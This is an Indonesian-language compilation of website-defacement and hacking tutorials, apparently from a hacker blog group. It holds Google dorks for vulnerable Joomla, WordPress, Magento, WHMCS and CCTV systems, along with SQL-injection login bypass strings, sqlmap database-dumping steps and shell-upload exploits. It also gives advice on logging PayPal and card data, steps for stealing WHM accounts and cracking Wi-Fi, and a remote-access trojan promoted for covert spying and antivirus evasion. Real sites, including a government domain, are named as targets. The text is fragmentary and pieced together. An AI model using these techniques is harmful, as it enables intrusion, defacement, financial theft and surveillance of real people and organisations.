[uploadify] | Wndows 7
7.Cara Mudah Deface Website Dengan Exploit Joomla JCE Extension | Remote File Upload
Vulnerability
14.Cara Mendapatkan WHM Dan cPanel Unlimited Gratis Dengan Exploit WHMCS 2016
15.CARA UPDATE ATSCAN PERL NASKAH UNTUK RENTAN SERVER, SITUS DAN SCANNER
DORK
Bahan-bahan
- kopi
- makanan
=========================
DiSINI (http://www.mediafire.com/download/2cdxocz5ispa7dg/CSRF.html)
=========================
=========================
DISINI (http://www.mediafire.com/download/b78byq28a461tad/madspotshell.rar)
=========================
inurl:/wp-content/themes/shepard
inurl:/wp-content/themes/money
inurl:/wp-content/themes/clockstone
inurl:/wp-content/themes/ambleside
inurl:/wp-content/themes/pacifico
Contoh :
http://maynetree.com/wp-content/themes/Clockstone/theme
Note: Jika muncul "You Must Login....."atau blank? cari target lain "Jika
muncul "error" berarti Web target Vulnerable
Contoh:
"http://maynetree.com/wp-content/themes/Clockstone/theme/functions/upload-
bg.php"
5. Buka file CSRF.html, akan muncul upload file. lalu Pilih Madspotshell.php lalu klik
upload.
6. Udah diganti ? dan jika berhasil maka tampilannya akan jadi seperti ini
Selesai :D
Selesai :D
Sumber:Google.com
2.Deface Dengan Teknik Bypass Admin Login Dengan SQL Inject
Kali ini TeamMalaikat Tersakiti akan membagikan sedikit teknik deface Bypass Admin
Login dengan SQL inject teknik ini kami dapetkan dari semua blog garuda securit
hacker.karena menurut Team UNDERGROUD teknik ini bagus maka kami juga menshare
langsung aja ke TKP.
Bahan Bahan
1. Koneksi Internet
2. Script Deface
3. Dork : inurl:/?mnux=login
Tutorial :
2. Setelah muncul web hasil dorking pilih yang menurut kamu (vuln)
5. Jika tidak langsung berada di tempat login kalian tinggal tambahkan /?mnux=login di
belakang url.
9. Setelah berhasil masuk dengan inject, kalian pilih menu Master di tabel atas (lihat tanda
merah) lalu pilih menu Mahasiswa.
10. Setelah pilih, kalian edit profile mahasiswa nya (lihat gambar)
13. Setelah selesai upload, untuk lihat hasil defacean nya, kalian bisa klik kanan pada gambar
yg hancur, lalu klik view image (lihat gambar)
inurl:member/daftar.php intext:NAMAKOTA
o inurl:/sch.id Team balitbang intext:NAMAKOTA
o intext:"Kamfret Team"sch.id Team Balitbang
o inurl:member/daftar.php
3. Shell.php , Jika tidak punya bisa pakai shell recoded ini Shell
(http://malaikattersakiti.blogspot.co.id/2016/07/shell-rabbit-security.html)
Lalu isi Formulir tersebut, Untuk Username ID Password Email isi dengan benar & pastikan
Email Aktif Untuk Yg Lain di isi asal juga bisa.
Jika sudah di isi semua Klik Simpan & Muncul seperti gambar dibawah.
Lalu cek email Terkadang masuk kedalam Spam Jika sudah Klik VALIDASI
MEMBER
Kemudian Login dengan Username & Password yg kamu isi tadi
Kemudian Save Lalu buka CSRF Dgn Mozilla Jika sudah dibuka maka muncul tampilan
CSRF Klik Browse & pilih shell mu lalu upload :v
Jika ada tulisan berhasil seperti digambar berarti shell sudah ter upload :D
Lalu Tekan tombol [ENTER] pada keyboard mu, lalu akan muncul tampilan seperti
Gambar
Cpanel BruteForce
Taraaa....
Coba kita test..
Login dehh :D
(http://www.mediafire.com/download/2fxshfeii557trn/Hmei7.zip)
Lanjut lagi :D
Seperti biasa, kalo mau nyari target silahkan gunakan dork, kembangin dorknya biar lebih
yoos :D
Nah, kalo sudah nemu banyak targetnya silahkan kumpulkan dan simpan dalam file
listsite.txt, disini ane cuma satu aja, sekedar buat coba-coba apakah toolsnya masih bekerja
atau tidak dan kalo list passwordnya mau dibanyakin juga boleh.
Selanjutnya kita jalankan Toolnya, lalu klik Load File, pilih file yg berisi web target sobat!
lalu klik open! dan klik Scan...
Tinggal nunggu hasilnya :) yang sabar yah :p
Kalo sobat mau coba silahkan saja :) tapi saya ga yakin bisa nemu web yang password mudah
ditebak, :D yah apa salahnya dicoba :v kalo ga dicoba siapa yang tau :v usaha dunk jangan
cuma enaknya doank, wkwkwk :D
SUMBER:GOOGLE.COM
6.Cara Deface Dengan Remote Shell Upload Vulnerability
[uploadify] | Wndows 7
Untuk mempersingkat waktu langsung saja masuk ke tutorial nya, sebelumnya
download dan instal dulu bahan yang diperlukan.
Langkah-langkah :
1. Sebelumnya install dahulu Xampp yang sudah sobat download tadi, lalu taruh
extract/taruh file ( Curl, Script Uploadify dan Shell ) kalian pada direktori
C:/Xampp/php setelah selesai, buka file Script Uploadifinya lalu setting sebagai
berikut :
$uploadfile="set.php"; ( set.php adalah nama shell yang saya pakai, set.php bisa
diganti dengan nama shell yang sudah kalian taruh di folder php )
3. Buka CMD lalu masuk ke direktori php pada xampp ( lihat gambar )
4. Jika sudah ikuti langkah diatas, sekarang waktunya jalankan Script Uploadify (
lihat gambar )
5. Jika keluar path seperti diatas, kemungkinan besar shell sudah berhasil terupload,
sekarang buka browser lalu ubah urlnya menjadi :
http://situs.com/administrator/components/com_bt_portfolio/set.php
6. Dalam contoh shell berhasil saya upload, sekarang terserah kalian mau diapakan
website tersebut >_<
Sekian tutorial yang bisa kami berikan, kurang lebihnya mohon maaf. Jika ada
kendala atau kesulitan dalam mengaplikasikan tutorial pada blog kami.
Udah ah ngomel2nya, langsung saja kita praktekkan :) Disini saya akan menjelaskan dua
Teknik yang berbeda tapi Konsepnya sama aja sih :D beda toolsnya aja :p
Bahan-Bahan :
(http://www.mediafire.com/download/c3iktuiamtiral3/onixidca.php)
Dork :
inurl:"/index.php?option=com_jce"
inurl:index.php?option=com_virtuemart
(http://hack-db.com/hacker/VanPersie/all_14.html
Buka deh JCE Exploiternya :) dan Selanjutnya masukan Targetnya, lalu klik Start
Catatan: "kalo ga bisa upload Shell, upload aja file depesan .php .html / .txt :)
Kalo upload shellnya berhasil, tinggal eksekusi shell, trus Tebas dah :D
Cara Kedua
Catatan : Rubah extensi Shellnya dulu menjadi jpg/gif. contoh : shell.jpg / shell.gif
SUMBER:GOOGLE.COM
8.Tutorial lengkap Magento by yuzac0de
-makan
-minuman dingin
Dork :
- intext:/skin/adminhtml/default/default/
- ganti site, intitle dan intext dengan apa saja / use your brain !
LETAK SMTP :
- system > configuration > view menu SMTP pro
- kalau ada SMTP PRO klik dan lihat username, password, port dan server nya
- kalau password masih bentuk ******* ( inspect element > ganti value "password"
dengan "text" )
Upload shell :
- perlu di ketahui tidak semua bisa di tanam shell , atau jika sembarangan tanam
shell webnya bakal error
- kalau vuln dan bisa di tanam shell pergi ke : system > file system > IDE > cari file >
edit UPLOADER atau LANGSUNG EDIT SHELL di dalamnya > save > dan kunjungi
file yang tadi di edit
Ngelog PP&CC :
- masuk ke /app/code/core/Mage/Catalog/Model/Product/Option/Type/File.php
$websites = Mage::app()->getWebsites();
$code = $websites[1]->getDefaultStore()->getCode();
$params['_store'] = $code;
*Catatan: jika ada ketidak sesuaian/ditemukan error tdak sperti gambar yg saya
sertakan berarti tidak bisa di upload file system!
(https://userscloud.com/mspdkv4gueo3)
Pass: yuzanotes.blogspot.co.id
- Nanti akan otomatis scrolling ke bawah sendiri dan jika sukses akan muncul notif
seperti gambar dibawah.
- Balik lagi ke dashboard admin, scrol ke atas aja terus klik Return to Admin
- Sekarang lihat file system udah terinstall. Dah sampe disini terserah mau diapain.
Untuk cara upload shell baca lagi di atas dah jelas
Email Test Sender :
- Harus nanem shell dulu, gak tau caranya? baca lagi dari atas
- Setelah itu buka lewat url, jika support kirim email akan nampak seperti gambar
dibawah
-sqlmap-0.9.zip (https://sourceforge.net/projects/sqlmap/files/sqlmap/0.9/sqlmap-
0.9.zip/download)
untuk tutorialnya :
2. cari website yg vuln terhadap sqli, (untuk dork bisa lihat di sini)
( http://pastebin.com/dzknXjgP)
ok, saya anggap anda sudah punya target sendiri, kalo belum silahkan cari di di google
3. buka cmd.
setelah itu ketik di cmd "cd [direktori sqlmap tadi yg anda extract]" lalu enter,..
*perintah "-u" adalah "URL" target kita yang akan di eksekusi oleh sqlmap. perintah "--
dbs" diatas adalah sqlmap akan berusaha mencari database dari web target kita tadi.
"GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]" tekan y
lalu enter
2. information_schema
5. setelah itu saat nya kita bongkar isinya , tapi database yang mana ? hmm,...
sepertinya saya tertarik dengan yang db_xxx , kenapa hayoo ? feeling aja :p
fungsi :
-u = url
-D = database
[11 tables]
+-------------------+
| areas |
| categories |
| featured |
| fields |
| jobfields |
| member_areas |
| member_categories |
| member_fields |
| members |
| projects |
| users |
+-------------------+
6. sekarang kita lihat dari tabel2 tersebut kira kira user dimna ? , mungkin di tabel user :v
fungsi :
-T = nama table
7. sekarang kita akan melihat isi dari column tersebut, dalam hal ini kita cukup melihat isi
dari column password dan username saja, dengan memasukan perintah :
fungsi :
-C = nama column
kita dapet username ama passwordnya(password masih dalam bentuk hash, jadi tinggal hash
di DI SINI (https://hashkiller.co.uk/md5-decrypter.aspx)
sekarang tinggal ngecrack passwordnya terus cari admin loginnya >> tebass :D
-kopi
-makan ringan dan matikan lampu kamar biyar lebih mantap waktu deface nya kayak di film-
film hhh :D
Exploit
(http://www.mediafire.com/download/ohovyqgv16dw03q/Exploit+Zimbra_2.zip)
Untuk mencari target gunakan dorks, untuk kali ini saya cuma memberian 1 dorks
Buka google.com
Masukkan dork diatas tadi kedalam google
Contoh : zimbra2.kinez.co.id
Kemudian liat hasilnya
Jika EROR seperti gambar di bawah ini tanda nya tidak vuln, silahkan cari target lain
Sumber:google.com
11.Cara Deface Web Dengan Exploit JCE Joomla Extension V3
Ada 2 cara yang dapat kita gunakan, yaitu dengan JCE Exploiter yang versi .exe & yang versi
.php
inurl:index.php?option=com_jce
3. Silahkan anda test satu persatu web dari hasil dork apakah web tersebut vuln atau tidak
dengan mencopy url webnya, yaitu : www.site.com
4. Buka JCE Exploiter yang tadi diunduh, lalu klik 2x pada JCE.exe
5. Jika vuln, maka akan keluar url/link shell anda di kolom bawah seperti ini
6. Anda copy link tersebut ke addressbar, maka akan muncul uploader untuk upload shell
anda
7. Untuk membuka shellnya, tinggal rename url di bagian paling belakang, yaitu 3xp.php
menjadi namashellanda.php
NB : Jika tidak bisa mengupload file php, maka anda coba saja upload file html/txt alias tidak
bisa upload shell, hanya upload script deface saja
3. Lalu anda upload file php tersebut pada web hosting anda/web hasil deface sebelumnya.
- Anda masukkan url target ke kolom "hostname", misal : www.site.com (tidak menggunakan
http://)
- Anda masukkan path target ke kolom "path", misal : webnya www.site.com/v2/, maka
pathnya /v2/ tapi jika tidak ada pathnya isi saja /
- "Please specify a file to upload" adalah untuk memilih shell anda yang akan diupload
6. Selanjutnya klik "start" dan proses exploitasi akan berjalan, jika berhasil maka dibawah
akan muncul tulisan seperti ini
7. Nah anda copy link tersebut ke addressbar, maka shell kesayangan anda akan muncul.
Silahkan deh dieksekusi.
NB : Jika tidak bisa mengupload file php, maka anda coba saja upload file html/txt alias tidak
bisa upload shell, hanya upload script deface saja
Contoh : www.site.com/siteadmin/
Username : superadmin
Password : jocho
9. Tunggu beberapa menit hingga file terupload. Jika sudah terupload, buka file deface anda
dengan format : www.site.com/images/namafile.html
Tuhh ada Hasil nya, segituu ane dapet nya :v Pilih yang mana aja bebas.
Nah liat disitu dia pake Cms apa, kalo Cms Joomla cari "configuration.php" kalo
Wordpress cari "wp-config.php". Berhubung site target jumping ane make Cms Wordpress
jadi ane cari "wp-config.php"
Tuhh keliatan, db_name, db_user, db_password, db_host . kalo udah buka My Sql form
login yang tadi di upload
Masukin data data yang di dapet tadi kalo, contoh nya liat gambar aja, kalo udah klik
"Connect"
Tadi kan target ane Cms nya Wordpress nah jadi disini ane cari "wp_users". kalo target ente
Cms nya Joomla cari aja yang berbau "jos_user".
Nahh kan ketauan User admin Pass dan lain lainn nya :v klik "Edit" Contohnya di gambar.
Nahh di kolom "user_pass" itu di ganti sama password ente Password Md5 yoo kalo belom
ada Create disini (http://md5cracker.org/) kalo udah klik Save / Edit , lihatt gambar.
Masuk ke admin loginnya, Cms Wordpress admin Login nya ada di http://localhost/wp-
login.php kalo Joomla ada di http://localhost/administrator/
kan target ane Cms nya Wordpress jadi ane masuk ke http://localhost/wp-login.php
SUMBER: GOOGLE.COM
Cara Mendapatkan WHM Dan cPanel Unlimited Gratis Dengan
Exploit WHMCS 2016
Mungkin kali ini Team Malaikat Tersakiti akan membhas tentang WHM semua pada tau apa
itu WHM, ya WHM itu adalah singkatan dari "Web Host Manager", WHM ini biasanya di
gunakan untuk membuat cPanel yang berguna sekali bagi para wapper terutama wap
Download,, dan biasanya mereka berburu cPanel Unlimited yang ruang disknya tidak
terbatas, berbeda dengan cPanel biasanya hanya di batasi 300 MB saja..
Dan pada postingan kali ini saya akan berbagi trik yaitu cara mendapatkan WHM dan cPanel
Unlimited secara cuma cuma ( Gratis ).
Oke pertama tama yang harus di lakukan adalah siapkan dulu Xamp atau Hostingan untuk
menjalankan script exploitnya, script bisa anda ambil ( Di Sini )
(http://pastebin.com/raw/CydbK5UP)
Setelah anda mendapatkan scriptnya silahkan upload hosting atau anda jalankan
menggunakan xamp yang ada di PC/Laptop anda.
WHMCS EXPLOIT
Selanjutnya anda masukkan dork berikut ke dalam kotak yang tersedia di form exploit
whmcs.
1. inurl:whmcs/cart.php?a=
2. inurl:billing/cart.php?a=
nah silahkan anda pilih 1 dork di atas kemudian masukkan ke form exploitnya dan klik
"exploit" maka nanti akan muncul result atau hasilnya.. dan dari beberapa result mungkin
yang bisa anda dapatkan 1 atau 2 whm atau tidak dapat sama sekali karena teknik ini
tergantung dork yang anda buat... jika anda dapat maka akan muncul user dan pass
WHMnya..
1. Buka WHM yang tadi anda dapat dari hasil dorking, setelah itu cari tulisan "Account
Function" dan klik menu tersebut.
2. Setelah di klik maka akan muncul menu baru dan klik tulisan "Create New Account".
Selanjutnya akan muncul form pembuatan akun cPanel baru..
3. Setelah form berhasil di isi tugas anda selanjutnya adalah memilih paket cPanel yang anda
inginkan, dan saya sendiri memlilh paket "Powet_User", ceklis option "Select Option
Manually" maka akan muncul form untuk setting Unlimitednya wkwkwk..
Jika semua sudah beres klik tombol "Creat/Buat" maka cPanel Unlimited anda siap untuk di
gunakan.
SUMBER:GOOGLE.COM
Deface Web Teknik Web Solutions
Skarang saya mau share tutorial Deface "Teknik Web Solutions - Bypass Admin Login
Priv8"
3> inurl:"/admincp/sdata/msecimgs/"
http://www.localhost.com/admincp/
[+] Exploit:
User:admin' or '1'='1
Pass:admin' or '1'='1
SUMBER:GOOGLE.COM
CARA UPDATE ATSCAN PERL NASKAH UNTUK RENTAN
SERVER, SITUS DAN SCANNER DORK
Apa yang Baru di 2016:
. + Header perubahan
+ versi Perl
+ jalan Script
ATSCAN adalah script perl dengan scanner fungsi Dork. XSS scanner. LFI
scanner.Menyaring situs wordpress dan Joomla di server. Cari halaman Admin. Decode /
Encode MD5 + Base64.
MENU :
1 = DORK SCANNER
2 = SITE SCANNER
3 = SERVER SCANNER
4 = MD5 / DASAR 64
5 = TENTANG
6 = EXIT (->)
SCAN SITUS PILIHAN :
Cara Penggunaan:
cd ATSCAN
perl atscan.pl
Update:
SUMBER:GOOGLE.COM
17.Com_fabrik Upload Vulnerability
Metode Serangan pemahaman Com_fabrik komponen Joomla memberikan Anda kekuatan
untuk menciptakan bentuk-bentuk dan tabel yang berjalan di dalam Joomla tanpa
memerlukan pengetahuan mySQL dan PHP. Kemudian makan data Anda ke dalam Google
Maps, Charts atau AJAX berdasarkan calendar.But itu rentan :)
Menemukan Sasaran Rentan Mari kita memulainya
Dork:
Eksploitasi: /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Jika Anda ingin mempersempit pencarian untuk domain .com atau domain .com.au kemudian
hanya menambahkan "site: com.au" di atas google dork.
Contoh: inurl:
(ini akan serach untuk kerentanan com_fabrik untuk website .com.au) Pemanfaatan Sasaran
1. Setelah Anda memiliki daftar situs, pilih situs web apapun dan mengganti menempatkan
mengeksploitasi di belakang situs. Contoh:
Dari
http://www.scb.travel/index.php?option=com_fabrik&view=table&tableid=9&calculations=0
&Itemid=85 Untuk
http://www.scb.travel/index.php?option=com_fabrik&c=import&view=import&filetype=csv
&table=1
Setelah file Anda berhasil upload , Anda perlu menambahkan /media/yourfilename.jpg untuk
melihat file Anda . contoh :
http://www.scb.travel/media/blackcyberseccrew.jpg
http://prdbihar.gov.in/index.php?option=com_fabrik&c=import&view=import&filetype=csv
&tableid=1
http://bluejaylodgecostarica.com/index.php?option=com_fabrik&c=import&view=import&fi
etype=csv&tableid=0 5. Anda juga dapat meng-upload shell Anda ke situs :)
SUMBER:GOOGLE.COM
17.Deface CMS Joomla Dengan Metode Exploit Joomla COM_USER
2016
Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan
karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi.
*Bahan-Bahan :
Internet :v *Wajib
Note : x Diganti Dengan Domain Suatu Negara. Misal : Com, My, Id, il, ru, it
Oke Kalo udah dapet Site Yang Vuln Terus Masukin Exploit :
index.php?option=com_users&view=registration
Contohnya :
Oke Kalo udah dapet Site Yang Vuln Terus Masukin Exploit :
index.php?option=com_users&view=registration
Contohnya :
Copy kodenya terus buka Exploit yang tadi di download pake notepad terus edit exploitnya
SUMBER:GOOGLE.COM
18.Cara Tamper Data (Upload PHP file)
Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah yang
jadi pertanyaan kalau web target hanya mendukung file.jpg untuk di upload gimana ? Nah itu
yang akan saya sharing tekhniknya. Tahap-tahapnya seperti berikut ini. Tapi dengan catatan
anda telah menguasai website target dengan tekhnik : sql injection , LFI / RFI , atau exploit.
1. Siapakan dulu file shell.php seperti : C99Shell, r57, atau lainya cari saja di google
2. Rename dengan nama : shell.php.jpg
3. Install add ons Tamper Data (https://addons.mozilla.org/en-us/firefox/addon/tamper-data/)
SUMBER:GOOGLE.COM
20.Com_fabrik Upload Vulnerability
Metode Serangan pemahaman Com_fabrik komponen Joomla memberikan Anda kekuatan
untuk menciptakan bentuk-bentuk dan tabel yang berjalan di dalam Joomla tanpa
memerlukan pengetahuan mySQL dan PHP. Kemudian makan data Anda ke dalam Google
Maps, Charts atau AJAX berdasarkan calendar.But itu rentan :)
Menemukan Sasaran Rentan Mari kita memulainya.
Dork:
Eksploitasi: /index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Jika Anda ingin mempersempit pencarian untuk domain .com atau domain .com.au kemudian
hanya menambahkan "site: com.au" di atas google dork.
Contoh: inurl:
(ini akan serach untuk kerentanan com_fabrik untuk website .com.au) Pemanfaatan Sasaran
1. Setelah Anda memiliki daftar situs, pilih situs web apapun dan mengganti menempatkan
mengeksploitasi di belakang situs. Contoh:
Dari
http://www.scb.travel/index.php?option=com_fabrik&view=table&tableid=9&calculations=0
&Itemid=85 Untuk
http://www.scb.travel/index.php?option=com_fabrik&c=import&view=import&filetype=csv
&table=1
Setelah file Anda berhasil upload , Anda perlu menambahkan /media/yourfilename.jpg untuk
melihat file Anda . contoh :
http://www.scb.travel/media/blackcyberseccrew.jpg
http://prdbihar.gov.in/index.php?option=com_fabrik&c=import&view=import&filetype=csv
&tableid=1
http://bluejaylodgecostarica.com/index.php?option=com_fabrik&c=import&view=import&fi
etype=csv&tableid=0 5. Anda juga dapat meng-upload shell Anda ke situs :)
SUMBER:GOOGLE.COM
21.Bypass shell Defacing web Wordpress type
Okey first step atau langkah pertama
langkah pertama yang harus brade lakukan jika ingin pepes website khusus nya type
wordpress ,yaitu dengan terlebih dahulu menganalisa web tersebut(lebih bagus lagi jika anda
sudah pernah menggunakanya offline pada localhost misalnya) Dengan ini setidak nya anda
sudah tau struktur folder yang ada dalam host tersebut.
setelah anda menganalisa web tersebut perhatikan fitur yang ditawarkan web type worpress
tersebut apa aja sehingga anda tau mengambil langkah apa dan dari mana dan dengan cara
apa kita bsa masuk dan Upload PHP sell kita yg sudah ready tentunya.
okey … sekarang setelah saya coba menganalisa salah satu web type wordpress(sebagai
bahan praktek kita coba yang ini aja gk usah jauh jauh ex:http://www.bekasiindependen.com)
setelah muter-muter seputar ini web saya menemukan celah di bagian ini : Plugin
EasyComment Upload
plugins/easy-comment-uploads/upload-form.php
ini bug tidak bisa saya jelaskan sekarang , bagaimana dan apa ??(butuh satu thread untuk
menjelaskan about ne bug) intinya bug ini memang sudah ada disediakan oleh Devloper
wordpress (buat para admin yg memakai wordpress coba direnungkan) nah sekarang setelah
bug nya udah dapat , coba kita susup via bug tadi dengan cara pada adress bar browser anda
ketikkan seperti:
http://[localhost]/[path]/wp-content/easy-comment-uploads/upload-form.php
conto yang saya praktekan dulu, pada adress bar browser ketik seperti ini :
http://www.bekasiindependen.com/wp-content/plugins/easy-comment-uploads/upload-
form.php
brows pada direktori anda pilih sell.php anda dan tunggu beberapa saat hingga proses loading
slesai
note*: tombol upload memang tidak ada saat anda select file itu dah auto upload kok. selanjut
nya mari kita lihat file kita tadi … lihat di bagian ini
http://www.bekasiindependen.com/emd5.php
Mengapa security test by md5coder karena nie post saya import dari blog saya yang satu lagi
berhubung ini lebih seo makanya saya import kesini dulunya ini saya post di blog saya yang
www.emd5coder.blogspot.com
Untuk skala besar anda bisa pake dork ini,buka google paste dork berikut silahkan dan
selamat berdeface.
“inurl:easy-comment-uploads/upload-form.php”
SUMBER:GOOGLE.COM
Yah , KemBalilaGi deNgaN saYa "Malaikat Tersakiti " sebenerNya Bosen jadi BlacHat..
Sekarang "wHiteHat aja deh " Heheheheh..
Ok KaLi iNi saya Dicky Ris Wanda ingiN menYaMpaIkaN tUtOriaL cara-hack-bandwidth-warnet-dengan-
cmd.
YaH,tenTusaja ini hanya ilMu peMbelajaRan.
janGan lah berBuat jail di warnet yahh... nanTi ketauan Sama OP Nya kena BeCok Lo ..
wkwkwkwk
Cara Hack Bandwith Warnet Dengan CMD-Bandwidth (disebut juga Data Transfer atau Site
Traffic) adalah data yang keluar+masuk/upload+download ke account anda.
Jika anda mengenal Telkom Speedy, Bandwidth ini cara kerjanya sama dengan Kuota di
Telkom Speedy. Hanya saja yang menjadi acuan bagi perhitungan kuota Telkom Speedy
adalah data yang keluar/masuk ke PC/Modem ADSL anda, sedangkan di hosting acuannya
adalah data yang keluar/masuk ke account.
Pada dasarnya sistem operasi windows sudah membatasi bandwidth untuk koneksi internet
sebanyak 20% dari total bandwidth yang seharusnya bisa maksimal, oleh karena itu jka anda
ingin hacking bandwidth warnet supaya koneksinya terasa lebih cepat & kencang, bisa
dengan cara mengurangi atau mengosongkan batasan bandwidth limit bandwidth tersebut
supaya pada Windows kita bisa maksimal dalam menggunakanbandwidth yang sudah ada.
Bayangkan aja bro..udah gak usah dibayangain tapi langsung TKP :)
Kalau seandainya bandwidth warnet 2mb masuk ke komputer lo semua, wah kalau buat
download kenceng abis sob. semoga aja gpedit.msc nya gk di block sama yang punya
warnet. Saat pergi kewarnet berdo’a dulu & jangan lupa berlagak seperti orang baru belajar
komputer biar pemilik warnet gak curiga..ckckckckk :)
1. Klik Start
2. Klik Run
3. Ketik gpedit.msc
4. Kemudian klik Ok
ketikan :
C:>gpedit.msc;
pencet tombol Alt+f4 sampai keDekstop lalu ke Start à Shutdown ,bayar warnet ,pulang
kerumah aja haha...
Semoga komputer yang anda sewa bisa terasa lebih cepat koneksinya internet kayak petir
lewat wkwkwk...
PeRINGATAN KERAS...!!!!
Kalomaucopy,Copyaja..
Credit : Anonboy
(kembangin lagi bro, biar banyak dpt web yg verawan and vuln)
Exploit: /index.php?option=com_adsmanager&task=upload&tmpl=component
contoh:
www.target.co.li//index.php?option=com_adsmanager&task=upload&tmpl=compone
nt
$url = "target/index.php?option=com_adsmanager&task=upload&tmpl=component";
// put URL Here
$post = array
);
curl_close ($ch);
echo $data;
?>
target dan shell ganti dgn url web target sobat, dan nama shell milik sobat.
lalu save dgn ekstensi php, di folder /XAMPP/PHP/ yang sudah terinstall di laptop
kalian masing2.
cd C:/xampp/php
php namasourcecodeanda.php
<form method="POST"
action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component"
enctype="multipart/form-data">
</form>
*save dengan ekstensi .html (contoh.html)
sumber: tkjcyberart.blogspot.co.id
24.TEKNIK HACK CCTV
1. Buka link ini:
GOOGLE.COM
3. Kemudian klik pencarian google akan menunjukan daftar items yang di cari.
kemudian masuklah ke salah satu link
tersebut……ada beberapa yang tidak
bekerja anda akan dapat melihat kamera lalu-lintas di sini tidak hanya itu..anda juga bisa
mengontrolnya,menggerakan ke kiri dan ke kanan juga bisa di zoom akan sangat
menyenangkan,bukan ? yang pasti anda membutuhkan koneksi yang sangat cepat semoga
bermanfaat dork yang lain:
inurl:”CgiStart?page=”
inurl:/view.shtml
intitle:”Live View / – AXIS
inurl:view/view.shtml
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtmlliveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera
NetworkCamera” (disconnected)
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210?
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=M
otion” (disconnected)
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1?
intitle:”sony network camera snc-m1?
site:.viewnetcam.com -www.viewnetcam.
com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image” (disconnected)
intitle:”i-Catcher Console – Web Monitor”
inurl :”CgiStart?page=Top Language=0″
SUMBER:GOOGLE.COM
25.CARA HACK WIFI DENGAN JUMPSTART + WPS-PIN
99%WORK
1. Jumpstart
Disini (http://www.tusfiles.net/w312q8xp7p59)
atau
Alternatif
2. Wpspin
Disini (http://www.tusfiles.net/yhu7sb3tuokq)
atau
Alternatif
Lanjut ke tutorial
Pertama extrack kedua file yang telah di download , lalu siapkan wifi yang tidak di ketahui
passwordnya
Agar angka pada kolom Pin 1,2,3 nya keluar centang bagian yang saya lingkari merah
kalau sudah keluar klik dua kali pin 1 pada barisan wifi yang ingin di hack
lalu akan muncul seperti ini, terus copy angka pada pin 1, lihat gambar
Kalau sudah di copy pin 1 nya, lanjut buka jumpstartnya
SUMBER:GOOGLE.COM
26.Imrat Hack komputer Jarak Jauh
Pada pagi hari ini dengan cuaca panas kami Team Malaikat Tersakiti akan membagikan
applikasi yang jarang kali lihat walaupun nama applikasi ini sudah sangat terkenal aplikasi ini
akan saya bagi gratis ini tool ini bernama Imrat versi 0.4 final langsung aja ke TKP.
imRAT v0.4 final adalah tool remote administrator yang berguna untuk melihat dan
mengendalikan komputer jarakjauh tanpa diketahui target, tool ini cocok untuk memata-matai
musuh, cyber war (botnet ddos) , hack akun (facebook, twitter, instagram, gmail dll) melalui
"lihat password ataupun keylogger.
1. Menejer file : melihat, membuat, upload, download, hapus dll pada pc korban
2. Buka file :
- Melalui Link
- Melalui Disk
3. Kendalikan desktop
10. Server :
- Perbaharui : Perbaharui melalui Link , Perbaharui melalui Disk
- Memulai kembali
- Hapus Server
- Putuskan jaringan
- Ganti nama
- Keluarkan
Syarat penggunaan :
2. pptp VPN open port atau bisa juga dengan TP-LINK untuk open port
3. akun on-ip
4. imrat
7.untuk server Rat nya biyar tidak mudah terdektesi antivirus ketika mau di share bisa
menggunakan Crypter
DOWNLOAD DI SINI
YANG MAU GABUNG DENGAN PENGGILA RAT MASUK AJA KE GRUB KAMI
http://malaikattersakiti.blogspot.co.id/